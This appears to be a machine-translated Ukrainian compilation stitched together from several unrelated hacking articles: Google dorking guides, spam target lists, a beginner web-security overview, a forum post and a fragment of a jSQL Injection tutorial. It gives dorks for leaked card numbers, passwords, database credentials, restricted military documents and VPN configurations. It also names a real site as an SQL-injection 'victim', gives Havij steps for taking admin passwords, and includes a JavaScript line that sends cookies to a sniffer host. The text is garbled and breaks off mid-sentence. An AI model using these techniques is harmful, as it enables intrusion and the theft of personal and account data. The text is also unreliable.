Inurl php e person id граємо. Інструкція з використання jSQL Injection - багатофункціонального інструменту пошуку та експлуатації SQL-ін'єкцій в Kali Linux. Пошук слів за допомогою додаткових операторів

Отримання приватних даних не завжди означає злом - іноді вони опубліковані в загальному доступі. Знання налаштувань Google і трохи кмітливості дозволять знайти масу цікавого - від номерів кредиток до документів ФБР.

WARNING

Вся інформація надана виключно в ознайомлювальних цілях. Ні редакція, ні автор не несуть відповідальності за будь-можливу шкоду, заподіяну матеріалами даної статті.

До інтернету сьогодні підключають все підряд, мало піклуючись про обмеження доступу. Тому багато приватні дані стають здобиччю пошукових систем. Роботи- «павуки» вже не обмежуються веб-сторінками, а індексують весь доступний в Мережі контент і постійно додають в свої бази не призначену для розголошення інформацію. Дізнатися ці секрети просто - потрібно лише знати, як саме запитати про них.

шукаємо файли

В умілих руках Google швидко знайде все, що погано лежить в Мережі, - наприклад, особисту інформацію та файли для службового використання. Їх частенько ховають, як ключ під половиком: справжніх обмежень доступу немає, дані просто лежать на задвірках сайту, куди не ведуть посилання. Стандартний веб-інтерфейс Google надає лише базові настройкирозширеного пошуку, але навіть їх буде достатньо.

Обмежити пошук по файлах певного виду в Google можна за допомогою двох операторів: filetype і ext. Перший задає формат, який пошуковик визначив по заголовку файлу, другий - розширення файлу, незалежно від його внутрішнього вмісту. При пошуку в обох випадках потрібно вказувати лише розширення. Спочатку оператор ext було зручно використовувати в тих випадках, коли специфічні ознаки формату у файлу були відсутні (наприклад, для пошуку конфігураційних файлів ini і cfg, всередині яких може бути все що завгодно). Зараз алгоритми Google змінилися, і видимої різниці між операторами немає - результати в більшості випадків виходять однакові.


фільтруємо видачу

За замовчуванням слова і взагалі будь-які введені символи Google шукає по всіх файлів на проіндексованих сторінках. Обмежити область пошуку можна по домену верхнього рівня, конкретному сайту або за місцем розташування шуканої послідовності в самих файлах. Для перших двох варіантів використовується оператор site, після якого вводиться ім'я домену або обраного сайту. У третьому випадку цілий набір операторів дозволяє шукати інформацію в службових полях і метаданих. Наприклад, allinurl відшукає заданий в тілі самих посилань, allinanchor - в тексті, забезпеченому тегом , Allintitle - в заголовках сторінок, allintext - в тілі сторінок.

Для кожного оператора є полегшена версія з більш коротким назвою (без приставки all). Різниця в тому, що allinurl відшукає посилання з усіма словами, а inurl - тільки з першим з них. Друге і наступні слова із схеми пошуку можуть зустрічатися на веб-сторінках де завгодно. Оператор inurl теж має відмінності від іншого схожого за змістом - site. Перший також дозволяє знаходити будь-яку послідовність символів на засланні на шуканий документ (наприклад, / cgi-bin /), що широко використовується для пошуку компонентів з відомими уразливими.

Спробуємо на практиці. Беремо фільтр allintext і робимо так, щоб запит видав список номерів і перевірочних кодів кредиток, термін дії яких закінчиться тільки через два роки (або коли їх власникам набридне годувати всіх підряд).

Allintext: card number expiration date / 2017 cvv

Коли читаєш в новинах, що юний хакер «зламав сервери» Пентагону або NASA, вкравши секретні відомості, то в більшості випадків мова йде саме про таку елементарну техніку використання Google. Припустимо, нас цікавить список співробітників NASA і їх контактні дані. Напевно такий перелік є в електронному вигляді. Для зручності або через недогляд він може лежати і на самому сайті організації. Логічно, що в цьому випадку на нього не буде посилань, оскільки призначений він для внутрішнього використання. Які слова можуть бути в такому файлі? Як мінімум - поле «адреса». Перевірити всі ці припущення простіше простого.


Inurl: nasa.gov filetype: xlsx "address"


користуємося бюрократією

Подібні знахідки - приємна дрібниця. По-справжньому ж солідний улов забезпечує більш детальне знання операторів Google для веб-майстрів, самій Мережі та особливостей структури шуканого. Знаючи деталі, можна легко відфільтрувати видачу та уточнити властивості потрібних файлів, щоб в залишку отримати дійсно цінні дані. Забавно, що тут на допомогу приходить бюрократія. Вона плодить типові формулювання, за якими зручно шукати випадково просочилися в Мережу секретні відомості.

Наприклад, обов'язковий в канцелярії міністерства оборони США штамп Distribution statement означає стандартизовані обмеження на поширення документа. Літерою A відзначаються публічні релізи, в яких немає нічого секретного; B - призначені лише для внутрішнього використання, C - строго конфіденційні і так далі до F. Окремо стоїть літера X, якою відзначені особливо цінні відомості, що становлять державну таємницю вищого рівня. Нехай такі документи шукають ті, кому це належить робити за службовим обов'язком, а ми обмежимося файлами з літерою С. Згідно з директивою DoDI 5230.24, таке маркування присвоюється документів, що містять опис критично важливих технологій, що потрапляють під експортний контроль. Виявити настільки ретельно охоронювані відомості можна на сайтах в домені верхнього уровня.mil, виділеного для армії США.

"DISTRIBUTION STATEMENT C" inurl: navy.mil

Дуже зручно, що в домене.mil зібрані тільки сайти з відомства МО США і його контрактних організацій. Пошукова видача з обмеженням по домену виходить виключно чистою, а заголовки - говорять самі за себе. Шукати подібним чином російські секрети практично марно: в доменах.ru і.рф панує хаос, та й назви багатьох систем озброєння звучать як ботанічні (ПП «Кипарис», САУ «Акація») або зовсім казкові (ТОС «Буратіно»).


Уважно вивчивши будь-який документ з сайту в домене.mil, можна побачити й інші маркери для уточнення пошуку. Наприклад, відсилання до експортних обмежень «Sec 2751», по якій також зручно шукати цікаву технічну інформацію. Час від часу її вилучають з офіційних сайтів, де вона одного разу засвітилася, тому, якщо в пошуковій видачі не вдається перейти за цікавою посиланням, скористайся кешем Гугла (оператор cache) або сайтом Internet Archive.

Збираємося в хмари

Крім випадково розсекречених документів урядових відомств, в кеші Гугла часом спливають посилання на особисті файли з Dropbox і інших сервісів зберігання даних, які створюють «приватні» посилання на публічно опубліковані дані. З альтернативними і саморобними сервісами ще гірше. Наприклад, наступний запит знаходить дані всіх клієнтів Verizon, у яких на роутері встановлено і активно використовується FTP-сервер.

Allinurl: ftp: // verizon.net

Таких розумників зараз знайшлося більше сорока тисяч, а навесні 2015 го їх було на порядок більше. Замість Verizon.net можна підставити ім'я будь-якого відомого провайдера, і чим він буде більш відомою, тим крупніше може бути улов. Через вбудований FTP-сервер видно файли на підключеному до маршрутизатора зовнішньому накопичувачі. Зазвичай це NAS для віддаленої роботи, персональне хмара або якась пірінгова качалка файлів. Весь вміст таких носіїв виявляється проіндексовано Google і іншими пошуковими системами, тому отримати доступ до зберігаються на зовнішніх дисках файлів можна за прямим посиланням.

підглядає конфіги

До повальної міграції в хмари як віддалених сховищ рулювали прості FTP-сервери, в яких теж вистачало вразливостей. Багато з них актуальні й досі. Наприклад, у популярної програми WS_FTP Professional дані про конфігурацію, призначених для користувача облікових записів і паролі зберігаються в файлі ws_ftp.ini. Його просто знайти і прочитати, оскільки всі записи зберігаються в текстовому форматі, а паролі шифруються алгоритмом Triple DES після мінімальної обфускаціі. У більшості версій досить просто відкинути перший байт.

Розшифрувати такі паролі легко за допомогою утиліти WS_FTP Password Decryptor або безкоштовного веб-сервісу.

Говорячи про злом довільного сайту, зазвичай мають на увазі отримання пароля з логів і резервних копій конфігураційних файлів CMS або додатків для електронної комерції. Якщо знаєш їх типову структуру, то легко зможеш вказати ключові слова. Рядки, подібні зустрічається в ws_ftp.ini, вкрай поширені. Наприклад, в Drupal і PrestaShop обов'язково є ідентифікатор користувача (UID) і відповідний йому пароль (pwd), а зберігається вся інформація в файлах з расшіреніем.inc. Шукати їх можна наступним чином:

"Pwd =" "UID =" ext: inc

Розкриваємо паролі від СУБД

У конфігураційних файлах SQL-серверів імена і адреси електронної поштикористувачів зберігаються у відкритому вигляді, а замість паролів записані їх хеши MD5. Розшифрувати їх, строго кажучи, неможливо, проте можна знайти відповідність серед відомих пар хеш - пароль.

До сих пір зустрічаються СУБД, в яких не використовується навіть хешування паролів. Файли будь-який з них можна просто подивитися в браузері.

Intext: DB_PASSWORD filetype: env

З появою на серверах Windows місцеконфігураційних файлів частково зайняв реєстр. Шукати по його гілках можна точно таким же чином, використовуючи reg як тип файлу. Наприклад, ось так:

Filetype: reg HKEY_CURRENT_USER "Password" =

Не забуваємо про очевидне

Іноді дістатися до закритої інформації вдається за допомогою випадково відкритих і потрапили в поле зору Google даних. Ідеальний варіант - знайти список паролів в якомусь поширеному форматі. Зберігати відомості акаунтів в текстовому файлі, документі Wordабо електронною таблиці Excelможуть тільки відчайдушні люди, але як раз їх ніколи не бракує.

Filetype: xls inurl: password

З одного боку, є маса коштів для запобігання подібних інцидентів. Необхідно вказувати адекватні права доступу в htaccess, патчить CMS, не використовувати ліві скрипти і закривати інші дірки. Існує також файл зі списком винятків robots.txt, який забороняє пошуковикам індексувати зазначені в ньому файли і каталоги. З іншого боку, якщо структура robots.txt на якомусь сервері відрізняється від стандартної, то відразу стає видно, що на ньому намагаються приховати.

Список каталогів і файлів на будь-якому сайті передує стандартним написом index of. Оскільки для службових цілей вона повинна зустрічатися в заголовку, то має сенс обмежити її пошук оператором intitle. Цікаві речі знаходяться в каталогах / admin /, / personal /, / etc / і навіть / secret /.

Стежимо за оновленнями

Актуальність тут вкрай важлива: старі уразливості закривають дуже повільно, але Google і його пошукова видача змінюються постійно. Є різниця навіть між фільтром «за останню секунду» (& tbs = qdr: s в кінці урла запиту) і «в реальному часі» (& tbs = qdr: 1).

Часовий інтервал дати останнього оновленняфайлу у Google теж вказується неявно. Через графічний веб-інтерфейс можна вибрати один з типових періодів (година, день, тиждень і так далі) або задати діапазон дат, але такий спосіб не годиться для автоматизації.

По виду адресного рядка можна здогадатися лише про спосіб обмежити виведення результатів за допомогою конструкції & tbs = qdr:. Буква y після неї задає ліміт в один рік (& tbs = qdr: y), m показує результати за останній місяць, w - за тиждень, d - за минулий день, h - за останню годину, n - за хвилину, а s - за секунду. Найсвіжіші результати, тільки що стали відомими Google, знаходиться за допомогою фільтра & tbs = qdr: 1.

Якщо потрібно написати хитрий скрипт, то буде корисно знати, що діапазон дат задається в Google в юліанському форматі через оператор daterange. Наприклад, ось так можна знайти список документів PDFзі словом confidential, завантажених c 1 січня по 1 липня 2015 року.

Confidential filetype: pdf daterange: 2457024-2457205

Діапазон вказується в форматі юліанських дат без урахування дробової частини. Переводити їх вручну з григоріанського календаря незручно. Простіше скористатися конвертером дат.

Таргетіруемся і знову фільтруємо

Крім вказівки додаткових операторів в пошуковому запиті їх можна відсилати в тілі посилання. Наприклад, уточненню filetype: pdf відповідає конструкція as_filetype = pdf. Таким чином зручно задавати будь-які уточнення. Припустимо, видача результатів тільки з Республіки Гондурас задається додаванням в пошуковий URL конструкції cr = countryHN, а тільки з міста Бобруйськ - gcs = Bobruisk. У розділі для розробників можна знайти повний список.

Засоби автоматизації Google покликані полегшити життя, але часто додають проблем. Наприклад, по IP користувача через WHOIS визначається його місто. На підставі цієї інформації в Google не тільки балансується навантаження між серверами, але і міняються результати пошукової видачі. Залежно від регіону при одному і тому ж запиті на першу сторінку потраплять різні результати, а частина з них може зовсім виявитися прихованою. Відчути себе космополітом і шукати інформацію з будь-якої країни допоможе її двобуквений код після директиви gl = country. Наприклад, код Нідерландів - NL, а Ватикану і Північної Кореї в Google свій код не лежав.

Часто пошукова видача виявляється засміченому навіть після використання декількох просунутих фільтрів. В такому випадку легко уточнити запит, додавши до нього кілька слів-винятків (перед кожним з них ставиться знак мінус). Наприклад, зі словом Personal часто вживаються banking, names і tutorial. Тому чистіші пошукові результатипокаже не хрестоматійний приклад запиту, а уточнений:

Intitle: "Index of / Personal /" -names -tutorial -banking

приклад наостанок

Досвідчений хакер відрізняється тим, що забезпечує себе всім необхідним самостійно. Наприклад, VPN - штука зручна, але або дорога, або тимчасова і з обмеженнями. Оформляти підписку для себе одного занадто накладно. Добре, що є групові підписки, а за допомогою Google легко стати частиною якоїсь групи. Для цього достатньо знайти файл конфігурації Cisco VPN, у якого досить нестандартне розширення PCF і впізнаваний шлях: Program Files \ Cisco Systems \ VPN Client \ Profiles. Один запит, і ти вливаєшся, наприклад, в дружний колектив Боннського університету.

Filetype: pcf vpn OR Group

INFO

Google знаходить конфігураційні файли з паролями, але багато хто з них записані в зашифрованому вигляді або замінені хешамі. Якщо бачиш рядки фіксованої довжини, то відразу шукай сервіс розшифровки.

Паролі зберігаються в зашифрованому вигляді, але Моріс Массар вже написав програму для їх розшифровки і надає її безкоштовно через thecampusgeeks.com.

при допомоги Googleвиконуються сотні різних типіватак і тестів на проникнення. Є безліч варіантів, які зачіпають популярні програми, основні формати баз даних, численні уразливості PHP, хмар і так далі. Якщо точно уявляти те, що шукаєш, це сильно спростить отримання потрібної інформації(Особливо тієї, яку не планували робити загальним надбанням). Чи не Shodan єдиний живить цікавими ідеями, Але будь-яка база проіндексованих мережних ресурсів!

Як правильно шукати за допомогою google.com

Всі напевно вміють користуватися такою пошуковою системою, Як гугл =) Але не всі знають, що якщо грамотно скласти пошукової запитза допомогою спеціальних конструкцій, то можна досягти результатів того, що Ви шукаєте набагато ефективніше і швидше =) У цій статті я постараюся показати що і як Вам потрібно робити, щоб шукати правильно

Гугл підтримує кілька розширених операторів пошуку, що мають спеціальне значення при пошуку на google.com. Характерно, ці оператори змінюють пошук, або навіть говорять Гуглу робити повністю різні типипошуку. Наприклад, конструкція link:є спеціальним оператором, і запит link: www.google.comне дасть вам нормального пошуку, але замість цього знайде все web-сторінки, які мають зв'язки до google.com.
альтернативні типи запитів

cache:Якщо Ви будете включати інші слова в запит, то Гугл підсвітить ці включені слова в межах кешувального документа.
наприклад, cache: www.сайт webпокаже кешувального вміст з підсвічується словом "web".

link:розглянутий вище пошукової запит покаже веб-сторінки, на яких містяться посилання до зазначеного запиту.
наприклад: link: www.сайтвідобразить всі сторінки на яких є посилання на http: //www.сайт

related:Відобразить web-сторінки, які є "подібними" (related) зазначеної web-сторінці.
наприклад, related: www.google.comперерахує web-сторінки, які є подібними домашній сторінці Google.

info:Інформація запиту: представить трохи інформації, яку Гугл має про запитуваної web-сторінці.
наприклад, info: сайтпокаже інформацію про нашому форумі =) (Армада - Форум адалт вебмайстрів).

Інші інформаційні запити

define:Запит define: забезпечить визначення слів, які Ви вводите після того, як це, зібраний з різних джерел мережі. Визначення буде для всієї введеної фрази (тобто, це буде включати всі слова в точний запит).

stocks:Якщо Ви починаєте запит з stocks: Гугл обробить решту термінів запиту як символи біржових зведень, і зв'яжеться зі сторінкою, яка ніколи готову інформацію для цих символів.
наприклад, stocks: Intel yahooпокаже інформацію про Intel і Yahoo. (Відзначте, що Ви повинні надрукувати символи останніх новин, не назва компанії)

модифікатори Запитів

site:Якщо Ви включаєте site: до своєї черги, Гугл обмежить результати тими веб-сайтами, які знайде в даному домені.
Також можна шукати і по окремих зонах, як таке ru, org, com, etc ( site: com site: ru)

allintitle:Якщо Ви запускаєте запит з allintitle :, Гугл обмежить результати з усіма словами запиту в заголовку.
наприклад, allintitle: google searchповерне всі сторінки гугла з пошуку як то images, Blog, etc

intitle:Якщо Ви включаєте intitle: в вашому запиті, Гугл обмежить результати документами, що містять те слово в заголовку.
наприклад, intitle: Бізнес

allinurl:Якщо Ви запускаєте запит з allinurl: Гугл обмежить результати, з усіма словами запиту в URL.
наприклад, allinurl: google searchповерне документи з google і search в заголовку. Також як варіант можна розділяти слова слешем (/) тоді слова по обидва боки слеша будуть шукатися в межах однієї сторінки: Приклад allinurl: foo / bar

inurl:Якщо Ви включаєте inurl: в вашому запиті, Гугл обмежить результати документами, що містять те слово в URL.
наприклад, Animation inurl: сайт

intext:шукає тільки в тексті сторінки вказане слово, ігноруючи назву і тексти посилань, і інше не відноситься до. Є також і похідна цього модифікатора - allintext:тобто далі все слова в запиті будуть шукатися тільки в тексті, що теж буває важливо, ігноруючи часто використовувані слова в посиланнях
наприклад, intext: форум

daterange:шукає в тимчасових рамках (daterange: 2452389-2452389), дати для часу вказуються в Юліанському форматі.

Ну і ще всякі цікаві прикладизапитів

Приклади складання запитів для Google. для спамерів

Inurl: control.guest? A = sign

Site: books.dreambook.com "Homepage URL" "Sign my" inurl: sign

Site: www.freegb.net Homepage

Inurl: sign.asp "Character Count"

"Message:" inurl: sign.cfm "Sender:"

Inurl: register.php "User Registration" "Website"

Inurl: edu / guestbook "Sign the Guestbook"

Inurl: post "Post Comment" "URL"

Inurl: / archives / "Comments:" "Remember info?"

"Script and Guestbook Created by:" "URL:" "Comments:"

Inurl:? Action = add "phpBook" "URL"

Intitle: "Submit New Story"

журнали

Inurl: www.livejournal.com/users/ mode = reply

Inurl greatestjournal.com/ mode = reply

Inurl: fastbb.ru/re.pl?

Inurl: fastbb.ru /re.pl? "Гостьова книга"

Блоги

Inurl: blogger.com/comment.g? "PostID" "anonymous"

Inurl: typepad.com/ "Post a comment" "Remember personal info?"

Inurl: greatestjournal.com/community/ "Post comment" "addresses of anonymous posters"

"Post comment" "addresses of anonymous posters" -

Intitle: "Post comment"

Inurl: pirillo.com "Post comment"

Форуми

Inurl: gate.html? "Name = Forums" "mode = reply"

Inurl: "forum / posting.php? Mode = reply"

Inurl: "mes.php?"

Inurl: "members.html"

Inurl: forum / memberlist.php? "

Я вирішив трохи розповісти про інформаційної безпеки. Стаття буде корисна починаючим програмістам і тим, хто тільки-тільки почав займатися Frontend-розробкою. В чому проблема?

Багато починаючі розробники так захоплюються написанням коду, що зовсім забувають про безпеку своїх робіт. І що найголовніше - забувають про такі вразливості, як запит SQL, XXS. А ще придумують легкі паролі для своїх адміністративних панелей і піддаються Брутфорс. Що це за атаки і як можна їх уникнути?

SQL-ін'єкція

SQL-ін'єкція - це найпоширеніший вид атаки на базу даних, який здійснюється при SQL-запиті для конкретної СУБД. Від таких атак страждає безліч людей і навіть великих компаній. Причина - помилка розробника при написанні бази даних і, власне кажучи, SQL-запитів.

Атака типу впровадження SQL можлива через некоректну обробки вхідних даних, що використовуються в SQL-запитах. При вдалому проходженні атаки з боку хакера ви ризикуєте втратити не тільки вміст баз даних, але і відповідно паролі і логи адміністративної панелі. А цих даних буде цілком достатньо, щоб повністю заволодіти сайтом або внести в нього незворотні корективи.

Атака може бути вдало відтворена в сценаріях, написаних на PHP, ASP, Perl і інших мовах. Успішність таких атак більше залежить від того, яка використовується СУБД і як реалізований сам сценарій. У світі дуже багато вразливих сайтів для SQL-ін'єкцій. У цьому легко переконатися. Досить ввести «Доркі» - це спеціальні запити з пошуку вразливих сайтів. Ось деякі з них:

  • inurl: index.php? id =
  • inurl: trainers.php? id =
  • inurl: buy.php? category =
  • inurl: article.php? ID =
  • inurl: play_old.php? id =
  • inurl: declaration_more.php? decl_id =
  • inurl: pageid =
  • inurl: games.php? id =
  • inurl: page.php? file =
  • inurl: newsDetail.php? id =
  • inurl: gallery.php? id =
  • inurl: article.php? id =

Як ними користуватися? Досить ввести їх в пошуковик Google або Яндекс. Пошуковик видасть вам не просто вразливий сайт, але і сторінку на цю вразливість. Але ми не будемо на цьому зупинятися і переконаємося, що сторінка дійсно вразлива. Для це досить після значення «id = 1» поставити одинарні лапки « '». Якось так:

  • inurl: games.php? id = 1 '

І сайт нам видасть помилку про запит SQL. Що ж потрібно далі нашому хакеру?

А далі йому потрібна це сама посилання на сторінку з помилкою. Потім робота над вразливістю в більшості випадків відбувається в дистрибутиві "Kali linux" з його утилітами по цій частині: впровадження ін'єкційного коду і виконання необхідних операцій. Як це буде відбуватися, я вам не можу сказати. Але про це можна знайти інформацію в інтернеті.

XSS Атака

Даний вид атаки здійснюється на файли Cookies. Їх в свою чергу дуже люблять зберігати користувачі. А чому ні? Як же без них? Адже завдяки Cookies ми не вбиваємо сто раз пароль від Vk.com або Mail.ru. І мало тих, хто від них відмовляється. Але в інтернеті для хакерів часто фігурує правило: коефіцієнт зручності прямо пропорційний коефіцієнту небезпеки.

Для реалізації XSS-атаки нашому хакеру потрібно знання JavaScript. Мова на перший погляд дуже простий і нешкідливий, тому що не має доступу до ресурсів комп'ютера. Працювати з JavaScript хакер може тільки в браузері, але і цього досить. Адже головне ввести код в веб-сторінку.

Детально говорити про процес атаки я не стану. Розповім лише основи і сенс того, як це відбувається.

Хакер може додати на який-небудь форум або гостьову книгу JS-код:

Скрипти переадресовують нас на заражену сторінку, де буде виконуватися код: будь то сниффер, якесь сховище або експлоід, який так чи інакше викраде наші Cookies з кешу.

Чому саме JavaScript? Тому що JavaScript відмінно ладнає з веб-запитами і має доступ до Cookies. Але якщо наш скрипт буде переводити нас на який-небудь сайт, то користувач це легко помітить. Тут же хакер застосовує більш хитрий варіант - просто вписує код в картинку.

Img = new Image ();

Img.src = "http://192.168.1.7/sniff.php?"+document.cookie;

Ми просто створюємо зображення і приписуємо йому в якості адреси наш сценарій.

Як уберегтися від усього цього? Дуже просто - не переходьте за підозрілими посиланнями.

DoS і DDos Атаки


DoS (від англ. Denial of Service - відмова в обслуговуванні) - хакерська атака на обчислювальну систему з метою привести її до відмови. Це створення таких умов, при яких сумлінні користувачі системи не можуть отримати доступ до надаваних системних ресурсів(Серверів), або цей доступ ускладнений. Відмова системи може бути і кроком до її захоплення, якщо в позаштатній ситуації ПО видає будь-яку критичну інформацію: наприклад, версію, частина програмного кодута ін. Але найчастіше це міра економічного тиску: втрата простий служби, що приносить дохід. Рахунки від провайдера або заходи по відходу від атаки відчутно б'ють «мета» по карману.В даний час DoS і DDoS-атаки найбільш популярні, так як дозволяють довести до відмови практично будь-яку систему, не залишаючи юридично значимих доказів.

Чим відрізняється DoS від DDos атаки?

DoS це атака побудована розумним способом. Наприклад, якщо сервер не перевіряє коректність вхідних пакетів, то хакер може зробити такий запит, який буде оброблятися вічно, а на роботу з іншими сполуками не вистачить процесорного часу. Відповідно клієнти отримають відмову в обслуговуванні. Але перевантажити або вивести з ладу таким способом великі відомі сайти не вийде. У них на озброєнні стоять досить широкі канали і надпотужні сервери, які без проблем справляються з подібною перевантаженням.

DDoS - це фактично така ж атака, як і DoS. Але якщо в DoS один пакет запиту, то в DDoS їх дуже може бути від сотні і більше. Навіть надпотужні сервера можуть не впоратися з таким перевантаженням. Наведу приклад.

DoS атака - це коли ти ведеш розмову з кимось, але тут підходить якийсь невихована людина і починає голосно кричати. Розмовляти при цьому або неможливо, або дуже складно. Рішення: викликати охорону, яка заспокоїть і виведе людини з приміщення. DDoS-атаки - це коли таких невихованих людей вбігає багатотисячний натовп. В такому випадку охорона не зможе всіх скрутити і відвести.

DoS і DDoS виробляються з комп'ютерів, так званих зомбі. Це зламані хакерами комп'ютери користувачів, які навіть не підозрюють, що їх машина бере участь в атаці будь-якого сервера.

Як уберегти себе від цього? В общем-то ніяк. Але можна ускладнити завдання хакеру. Для цього необхідно вибрати хороший хостингз потужними серверами.

Bruteforce атака

Розробник може придумати дуже багато систем захисту від атак, повністю переглянути написані нами скрипти, перевірити сайт на вразливість і т.д. Але коли дійде до останнього кроку верстки сайту, а саме коли буде просто ставити пароль на адмінку, він може забути про одну річ. Пароль!

Категорично не рекомендується ставити простий пароль. Це можуть бути 12345, 1114457, vasya111 і т. Д. Не рекомендується ставити паролі довжиною менше 10-11 символів. Інакше ви можете піддатися звичайнісінькою і не складної атаки - Брутфорс.

Брутфорс - це атака перебору пароля за словником з використанням спеціальних програм. Словники можуть бути різні: латиниця, перебір по цифрах скажімо до будь-якого діапазону, змішані (латиниця + цифри), і навіть бувають словники з унікальними символами @ # 4 $% & * ~~ ` '" \? та ін.

Звичайно такого виду атаки легко ізбежать.Достаточно придумати складний пароль. Вас може врятувати навіть капча. А ще, якщо ваш сайт зроблений на CMS, то багато хто з них обчислюють подібний вид атаки і блокують ip. Треба завжди пам'ятати, чим більше різних символів в паролі, тим важче його підібрати.

Як же працюють «Хакери»? У більшості випадків вони або підозрюють, або заздалегідь знають частина пароля. Зовсім логічно припустити, що пароль користувача вже точно не буде складатися з 3 або 5 символів. Такі паролі призводять до частих зломів. В основному хакери беруть діапазон від 5 до 10 символів і додають туди кілька символів, які можливо знають заздалегідь. Далі генерують паролі з потрібними діапазонами. У дистрибутиві Kali linux є навіть програми для таких випадків. І вуаля, атака вже не буде тривати довго, так як обсяг словника вже не такий і великий. До того ж хакер може задіяти потужність відеокарти. Деякі з них підтримують систему CUDA, при цьому швидкість перебору збільшується аж в 10 разів. І ось ми бачимо, що атака таким простим способомцілком реальна. А адже Брутфорс піддаються не тільки сайти.

Дорогі розробники, ніколи не забувайте про систему інформаційної безпеки, адже сьогодні від подібних видів атак страждає чимало людей, в тому числі і держав. Адже найбільшою вразливістю є людина, яка завжди може десь відволіктися або десь не доглянути. Ми програмісти, але не запрограмовані машини. Будьте завжди напоготові, адже втрата інформації загрожує серйозними наслідками!

І так, зараз я розповім про те, як без особливих знань чого або зламати щось. Кажу відразу, вигоди з цього мало, але все ж.
Для початку, треба знайти самі сайти. Для цього йдемо в google.com і шукаємо по Доркен

Inurl: pageid = inurl: games.php? Id = inurl: page.php? File = inurl: newsDetail.php? Id = inurl: gallery.php? Id = inurl: article.php? Id = inurl: show.php? id = inurl: staff_id = inurl: newsitem.php? num = inurl: readnews.php? id = inurl: top10.php? cat = inurl: historialeer.php? num = inurl: reagir.php? num = inurl: Stray- Questions-View.php? num = inurl: forum_bds.php? num = inurl: game.php? id = inurl: view_product.php? id = inurl: newsone.php? id = inurl: sw_comment.php? id = inurl: news.php? id = inurl: avd_start.php? avd = inurl: event.php? id = inurl: product-item.php? id = inurl: sql.php? id = inurl: news_view.php? id = inurl: select_biblio.php? id = inurl: humor.php? id = inurl: aboutbook.php? id = inurl: ogl_inet.php? ogl_id = inurl: fiche_spectacle.php? id = inurl: communique_detail.php? id = inurl: sem. php3? id = inurl: kategorie.php4? id = inurl: news.php? id = inurl: index.php? id = inurl: faq2.php? id = inurl: show_an.php? id = inurl: preview.php? id = inurl: loadpsb.php? id = inurl: opinions.php? id = inurl: spr.php? id = inurl: pages.php? id = inurl: announce.php? id = inurl: clanek.php4? id = i nurl: participant.php? id = inurl: download.php? id = inurl: main.php? id = inurl: review.php? id = inurl: chappies.php? id = inurl: read.php? id = inurl: prod_detail.php? id = inurl: viewphoto.php? id = inurl: article.php? id = inurl: person.php? id = inurl: productinfo.php? id = inurl: showimg.php? id = inurl: view. php? id = inurl: website.php? id = inurl: hosting_info.php? id = inurl: gallery.php? id = inurl: rub.php? idr = inurl: view_faq.php? id = inurl: artikelinfo.php? id = inurl: detail.php? ID = inurl: index.php? = inurl: profile_view.php? id = inurl: category.php? id = inurl: publications.php? id = inurl: fellows.php? id = inurl : downloads_info.php? id = inurl: prod_info.php? id = inurl: shop.php? do = part & id = inurl: productinfo.php? id = inurl: collectionitem.php? id = inurl: band_info.php? id = inurl : product.php? id = inurl: releases.php? id = inurl: ray.php? id = inurl: produit.php? id = inurl: pop.php? id = inurl: shopping.php? id = inurl: productdetail .php? id = inurl: post.php? id = inurl: viewshowdetail.php? id = inurl: clubpage.php? id = inurl: memberInfo.php? id = inurl: section.php? id = in url: theme.php? id = inurl: page.php? id = inurl: shredder-categories.php? id = inurl: tradeCategory.php? id = inurl: product_ranges_view.php? ID = inurl: shop_category.php? id = inurl: transcript.php? id = inurl: channel_id = inurl: item_id = inurl: newsid = inurl: trainers.php? id = inurl: news-full.php? id = inurl: news_display.php? getid = inurl: index2. php? option = inurl: readnews.php? id = inurl: top10.php? cat = inurl: newsone.php? id = inurl: event.php? id = inurl: product-item.php? id = inurl: sql. php? id = inurl: aboutbook.php? id = inurl: preview.php? id = inurl: loadpsb.php? id = inurl: pages.php? id = inurl: material.php? id = inurl: clanek.php4? id = inurl: announce.php? id = inurl: chappies.php? id = inurl: read.php? id = inurl: viewapp.php? id = inurl: viewphoto.php? id = inurl: rub.php? idr = inurl: galeri_info.php? l = inurl: review.php? id = inurl: iniziativa.php? in = inurl: curriculum.php? id = inurl: labels.php? id = inurl: story.php? id = inurl: look.php? ID = inurl: newsone.php? Id = inurl: aboutbook.php? Id = inurl: material.php? Id = inurl: opinions.php? Id = inurl: announce.php? Id = inurl: rub.php? Idr = inurl: galeri_info.php? l = inurl: tekst.php? idt = inurl: newscat.php? id = inurl: newsticker_info.php? idn = inurl: rubrika.php? idr = inurl: rubp.php? idr = inurl: offer.php? idf = inurl: art.php? idm = inurl: title.php? id = inurl: ". php? id = 1" inurl: ". php? cat = 1" inurl: ". php? catid = 1 "inurl:". php? num = 1 "inurl:". php? bid = 1 "inurl:". php? pid = 1 "inurl:". php? nid = 1 "

ось невеликий списочок. Можете використовувати свої. І так, ми знайшли сайт. наприклад http://www.vestitambov.ru/
Далі качаємо цю програму

** Hidden Content: To see this hidden content your post count must be 3 or greater. **

Тиснемо ОК. Потім вставляємо сайт жертву.
Тиснемо старт. Далі чекаємо результатів.
І так, програма знайшла SQL вразливість.

Далі качаємо Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= вставляємо отримане посилання туди. Пояснювати як користуватися Havij і де качати не буду, знайти його не важко. Всі. Ви отримали потрібні вам дані - пароль адміністратора, а далі справа вже вашої фантазії.

П.С. Це моя перша спроба щось написати. Перепрошую якщо щось не так

Запустіть завантажений файл подвійним кліком (потрібно мати віртуальну машину ).

3. Анонімність при перевірці сайту на SQL-ін'єкції

Налаштування Tor і Privoxy в Kali Linux

[Розділ в розробці]

Налаштування Tor і Privoxy в Windows

[Розділ в розробці]

Налаштування роботи через проксі в jSQL Injection

[Розділ в розробці]

4. Перевірка сайту на SQL-ін'єкції з jSQL Injection

Робота з програмою дуже проста. Досить ввести адресу сайту і натиснути ENTER.

На наступному скріншоті видно, що сайт вразливий відразу до трьох видів SQL-ін'єкцій (інформація про них вказана в правому нижньому кутку). Клікнувши на назви ін'єкцій можна перемкнути використовуваний метод:

Також нам вже виведені наявні бази даних.

Можна подивитися вміст кожної таблиці:

Зазвичай, найцікавішим в таблицях є облікові дані адміністратора.

Якщо вам пощастило і ви знайшли дані адміністратора - то радіти рано. Потрібно ще знайти адмінку, куди ці дані вводити.

5. Пошук адмінок з jSQL Injection

Для цього переходите на наступну вкладку. Тут нас зустрічає список можливих адрес. Можете вибрати одну або кілька сторінок для перевірки:

Зручність полягає в тому, що не потрібно використовувати інші програми.

На жаль, неурядових програмістів, які зберігають паролі у відкритому вигляді, не дуже багато. Досить часто в рядку пароля ми бачимо щось на кшталт

